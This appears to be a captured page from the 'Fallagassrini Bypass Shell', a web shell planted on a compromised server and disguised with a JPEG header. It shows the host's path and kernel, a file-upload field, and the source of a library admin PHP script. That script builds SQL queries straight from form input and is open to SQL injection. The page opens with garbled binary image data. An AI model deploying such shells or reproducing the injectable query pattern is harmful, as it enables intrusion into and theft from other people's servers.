JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/easwari/www/llm/

Linux 141.162.178.68.host.secureserver.net 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Upload File :
Current File : /home/easwari/www/llm/create_magazine.php

<?php
include('is_autheticated.php');

//print_r($_POST);
	//$name=$_POST['book_name'];
	
if(isset($_POST['add_magazine']))
{



	 $cheks=mysql_query("select * from magazine where name='".$_POST['name']."' and code='".$_POST['code']."'");
	 $cheks1=mysql_num_rows($cheks);
	// print_r($cheks1);
	if($cheks1!=1)
	{
	 $createdate=date('Y-m-d, h:i:s');
	 $source=mysql_query("insert into magazine(name,frequency,cost,language,reading_charges1,reading_charges,default_reading_days,code,late_fee,is_created)values
	 ('".$_POST['name']."','".$_POST['frequency']."','".$_POST['cost']."','".$_POST['language']."','".$_POST['reading_charges1']."','".$_POST['reading_charges2']."','".$_POST['default_reading_days']."','".$_POST['code']."','".$_POST['late_fee']."','$createdate')");
	  $id=mysql_insert_id();
	
	 if($source)
	 { ?>
     <script type="application/javascript">
	 window.location.href="manage_magazine.php?msg=success";
	 </script>
	 
	 <?Php }
	 
	 }
	 else
	 {
	 $msg_display1="Already Added Magazine";
	 }
	
}
?>
<!--<script type="text/javascript">
        $(document).ready(function () {
            setupTinyMCE();
            setupProgressbar('progress-bar');
            setDatePicker('entry_date');
            setupDialogBox('dialog', 'opener');
            $('input[type="checkbox"]').fancybutton();
            $('input[type="radio"]').fancybutton();
        });
    </script>-->

<!DOCTYPE html>
<html lang="en">
	
<!-- Mirrored from jesus.gallery/cloud2/form.html by HTTrack Website Copier/3.x [XR&CO'2013], Sat, 18 Apr 2015 04:40:46 GMT -->
<head>
		<meta charset="UTF-8" />
		<meta name="viewport" content="width=device-width, initial-scale=1.0"> 
		<title>Easwary Library Lending Library</title>
		<meta name="description" content="Cloud Admin Panel" />
		<meta name="keywords" content="Admin, Dashboard, Bootstrap3, Sass, transform, CSS3, HTML5, Web design, UI Design, Responsive Dashboard, Responsive Admin, Admin Theme, Best Admin UI, Bootstrap Theme, Bootstrap, Light weight Admin Dashboard,Light weight, Light weight Admin, Light weight Dashboard" />
		<meta name="author" content="Bootstrap Gallery" />
		<link rel="stylesheet" href="css/bootstrap.min.css" />
<link rel="stylesheet" href="css/bootstrap-responsive.min.css" />
<link rel="stylesheet" href="css/colorpicker.css" />
<link rel="stylesheet" href="css/datepicker.css" />
<link rel="stylesheet" href="css/uniform.css" />
<link rel="stylesheet" href="css/select2.css" />
<link rel="stylesheet" href="css/matrix-style.css" />
<link rel="stylesheet" href="css/matrix-media.css" />
<link rel="stylesheet" href="css/bootstrap-wysihtml5.css" />
<link href="font-awesome/css/font-awesome.css" rel="stylesheet" />
<link href='http://fonts.googleapis.com/css?family=Open+Sans:400,700,800' rel='stylesheet' type='text/css'>

<link rel="stylesheet" href="css/animate.css" />
<link rel="stylesheet" href="css/fullcalendar.css" />
<link rel="stylesheet" href="css/jquery.gritter.css" />
	</head>  

	<body>

		<!-- Left sidebar start -->
		<?php include('left_menu.php'); ?>
		<!-- Left sidebar end -->

		<!-- Dashboard Wrapper Start -->
		<div class="dashboard-wrapper">

			<!-- Header start -->
			<?php include('header.php'); ?>
			<!-- Header ends -->

			<!--main-container-part-->
<div id="content">
<!--breadcrumbs-->
  <div id="content-header">
    <div id="breadcrumb"> <a href="index.php" title="Go to Home" class="tip-bottom"><i class="icon-home"></i> Home</a><a href="#" class="tip-bottom">Books</a> <a href="#" class="current">Create Magazine</a></div>
  </div>
<!--End-breadcrumbs-->

<!--Action boxes-->
  <div class="container-fluid">
    <div class="row-fluid">
  <div class="span12">
      <div class="widget-box">
        <div class="widget-title"> <span class="icon"> <i class="icon-th-large"></i> </span>
          <h5>New Magazine</h5><span class="icon" style="float:right"><a href="manage_magazine.php"> <i class="icon-th-list" title="List Magazine"></i></a> </span>
        </div>
		
		<div class="widget-content nopadding"  style="height:100%;">
			            
			               <form name="magazines" id="magazines" method="post" class="form-horizontal">
						<!--   <label><b style="color:#900"><?php echo $msg_display1;?></b></label>
                             <?php if($_GET['msg']=='success') { ?> <p <b style="color:#900">Successfully Inserted Magazine</p> <?php } ?>-->
							 
                             <div class="span5" style="margin-left:30px;">
			                <div class="control-group">
			                  <label for="exampleInputPassword1" class="control-label">Language</label>
							   <div class="controls">
			                  <select id="language" name="language" tabindex="1">
							  <option value="-1">Select Language</option>
                              <?php 
							  $views=mysql_query("select distinct name from language order by name"); 
							   while($branch=mysql_fetch_array($views)) { 	?>
							 <option value="<?php echo $branch['name']; ?>" ><?php echo $branch['name']; ?></option>
							 <?php } ?>
							 </select>
			                </div>
							</div>
							</div>
							
                           <div class="span5">
			                <div class="control-group">
			                  <label for="exampleInputPassword1" class="control-label">Frequency</label>
							   <div class="controls">			
                              <select   id="frequency" name="frequency" required tabindex="2"/>
                               <option value="-1">Select Frequency</option>
                              <option value="Weekly">Weekly</option>
									<option value="FortNight">FortNight</option>
									<option value="Monthly">Monthly</option>
									<option value="Quarterly">Quarterly</option>
									<option value="Half-Yearly">Half-Yearly</option>
									<option value="Yearly">Yearly</option>
                              </select>
			                </div>
							</div>
							</div>
							
							 <div class="span5">
			                <div class="control-group">
			                  <label for="exampleInputPassword1" class="control-label">Code</label>
							   <div class="controls">
			                  <input type="text" id="code" name="code" onBlur="showcodes(this.value)" required tabindex="3"/>
			                </div>
							<div id="emailError"></div>
							</div>
							</div>
                           
						    <div class="span5">
			                <div class="control-group">
			                  <label for="exampleInputPassword1" class="control-label">Cost</label>
							   <div class="controls">
			                  <input type="number"  id="cost" name="cost" onBlur="showreadings(this.value)" required tabindex="5"/>
			                </div>
							<div id="read_codes"></div>
							</div>
							</div>
			               
						   
                          <div class="span5">
			                <div class="control-group">
			                  <label for="exampleInputPassword1" class="control-label">Name</label>
							   <div class="controls">
							  <input type="text"   name="name" id="name" onBlur="showname(this.value)"  required tabindex="4"/>
			                 </div>
                             <div id="emailError1"></div>
							 </div>
							 </div>
			                
                          
                            
                           <!--  <div class="form-group">
			                  <label for="exampleInputEmail1">Cost2</label>
			                  <input type="text" class="form-control" id="cost2" name="cost2" onBlur="showreadings(this.value)">
			                </div>-->
			               
                            <div id="read_charges">
                              <div class="span5">
			                <div class="control-group" style="margin-left:27px;">
			                  <label for="exampleInputPassword1" class="control-label">Reading Charges 3 Days</label>
							   <div class="controls">
			                  <input type="text" id="reading_charges1" name="reading_charges1" tabindex="6">
			                </div>
							</div>
							</div>
                            
                            <div class="span5">
			                <div class="control-group">
			                  <label for="exampleInputPassword1" class="control-label">Reading Charges 5 Days</label>
							   <div class="controls">
			                  <input type="text"  id="reading_charges2" name="reading_charges2" tabindex="7">
			                </div>
							</div>
							</div>
							
                           <div class="span5">
			                <div class="control-group">
			                  <label for="exampleInputPassword1" class="control-label">Default Reading Days</label>
							   <div class="controls">			                
			                  <input type="text"  id="default_reading_days" name="default_reading_days" tabindex="8">
			                </div>
                            </div>
							</div>
							</div>
                            
                           <div class="span5">
			                <div class="control-group">
			                  <label for="exampleInputPassword1" class="control-label">Late fee</label>
							   <div class="controls">	
			                  <input type="text"  id="late_fee" name="late_fee" required tabindex="9"/>
			                </div>
							</div>
							</div>
							
			               <div class="form-actions" align="center">
						    <div style="margin-top:200px;">
							<input type="submit" name="add_magazine" value="Create Magazine Masters" class="btn btn-success" tabindex="10" />
                            <input type="reset" name="reset" value="Cancel" class="btn btn-danger" tabindex="11" onClick="history.go(-1);" />
			                </div>
							</div>
			              </form>
			            </div>
			          </div>
			        </div>
			      </div>
				</div>
			  </div>
			<!-- Main Container Start -->

			<!-- Footer Start -->
			<div class="row-fluid">
  <div id="footer" class="span12"> Copyright Cloud Admin <span>2015</span>. All Rights Reserved. </div>
</div>

			<!-- Footer end -->
		</div>
		<!-- Dashboard Wrapper End -->
        
        <script type="text/javascript" src="js/jquery-1.6.1.min.js"></script>
 
	<script type='text/javascript'>
	
	function showreadings(ids)
	{
		//alert(ids);
		$.ajax({
		type: "POST",
		url: "get_readingmagazine.php",
		data: {s:ids},
		success: function(data) {
			$("#read_charges").html(data);
			}
		});
	
	}
	
	function showcodes(code)
	{
		//alert(ids);
		$.ajax({
		type: "POST",
		url: "get_checkcode.php",
		data: {code:code},
		success: function(data) {
		if(data == 1) {
                    //the email is available
                    $("#emailError").html("Kindly give new code");
                	$("#emailError").css('background-color','red');
					$('#code').val('');
					}
                else {
                    //the email is not available
                    $("#emailError").html("");
                }
			}
		});
	
	}
	
	function showname(code)
	{
		//alert(ids);
		$.ajax({
		type: "POST",
		url: "get_checkname.php",
		data: {code:code},
		success: function(data) {
		if(data == 1) {
                    //the email is available
                    $("#emailError1").html("Kindly give new name");
                	$("#emailError1").css('background-color','red');
					$('#name').val('');
					}
                else {
                    //the email is not available
                    $("#emailError1").html("");
                }
			}
		});
	
	}
	
		
	
	</script>
	<style type="text/css">

	

	button, input, select, textarea {

    border: 2px solid #bfe0f3;

    border-radius: 0;

    box-shadow: none;

    height: 40px;

	 padding: 8px 16px;

}

	

	

	.read_charges {

    border: 2px solid #bfe0f3;

    border-radius: 0;

    box-shadow: none;

    height: 40px;

    padding: 8px 16px;

}

	</style>
    <script src="js/jquery.min.js"></script> 
<script src="js/jquery.ui.custom.js"></script> 
<script src="js/bootstrap.min.js"></script> 
<script src="js/bootstrap-colorpicker.js"></script> 
<script src="js/bootstrap-datepicker.js"></script> 
<script src="js/jquery.toggle.buttons.js"></script> 
<script src="js/masked.js"></script> 
<script src="js/jquery.uniform.js"></script> 
<script src="js/select2.min.js"></script> 
<script src="js/matrix.js"></script> 
<script src="js/matrix.form_common.js"></script> 
<script src="js/wysihtml5-0.3.0.js"></script> 
<script src="js/jquery.peity.min.js"></script> 
<script src="js/bootstrap-wysihtml5.js"></script> 

<script src="js/bootstrap.min.new.js"></script>
<script src="js/custom.js"></script>
<script>
	$('.textarea_editor').wysihtml5();
</script>
<script src="js/excanvas.min.js"></script> 
<!--<script src="js/jquery.min.js"></script> -->
<script src="js/bootstrap.min.js"></script> 
<script src="js/jquery.flot.min.js"></script> 
<script src="js/jquery.flot.resize.min.js"></script> 
<script src="js/jquery.peity.min.js"></script> 
<script src="js/fullcalendar.min.js"></script> 
<script src="js/matrix.js"></script> 
<script src="js/matrix.dashboard.js"></script> 
<script src="js/jquery.gritter.min.js"></script> 
<script src="js/matrix.interface.js"></script> 
<script src="js/matrix.chat.js"></script> 
<script src="js/jquery.validate.js"></script> 
<script src="js/matrix.form_validation.js"></script> 
<script src="js/jquery.wizard.js"></script> 
<script src="js/jquery.uniform.js"></script> 
<script src="js/matrix.popover.js"></script> 
<script src="js/jquery.dataTables.min.js"></script> 
<script src="js/matrix.tables.js"></script> 


	</body>

<!-- Mirrored from jesus.gallery/cloud2/form.html by HTTrack Website Copier/3.x [XR&CO'2013], Sat, 18 Apr 2015 04:40:46 GMT -->
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net